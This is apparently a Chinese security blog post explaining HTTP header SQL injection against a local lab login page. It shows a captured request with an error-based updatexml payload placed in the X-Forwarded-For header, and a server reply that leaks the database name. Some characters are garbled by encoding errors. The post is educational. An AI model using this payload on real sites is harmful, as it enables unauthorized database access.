http头部注入
http頭部注入
我們首先可以在瀏覽器設(shè)置手動(dòng)代理模式,然后通過(guò)burpsuite進(jìn)行代理配置后進(jìn)行抓包,如下是一個(gè)網(wǎng)站登錄頁(yè)面的http頭部信息:
POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin因?yàn)槲覀冞@個(gè)網(wǎng)站代碼中的ip字段和數(shù)據(jù)庫(kù)中有交互,所以我們可以通過(guò)http頭部信息中的X-Forwarded-For字段進(jìn)行注入,注入代碼如下:
POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin服務(wù)器的回應(yīng):
HTTP/1.1 200 OK Date: Tue, 25 Jun 2019 11:05:32 GMT Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 46 Connection: close Content-Type: text/html;charset=utf-8??¥èˉ¢?—¥??—??oé”?XPATH syntax error: '#baji#'error后面的baji就是我們想要的結(jié)果。
這就是我理解的http頭部注入的原理,http頭部注入的前提是頭部字段中的數(shù)據(jù)要與數(shù)據(jù)庫(kù)產(chǎn)生交互,然后把你的注入代碼組合到相應(yīng)的字段里。
總結(jié)
- 上一篇: sql注入-error、boolean、
- 下一篇: 常见的上传绕过以及解析漏洞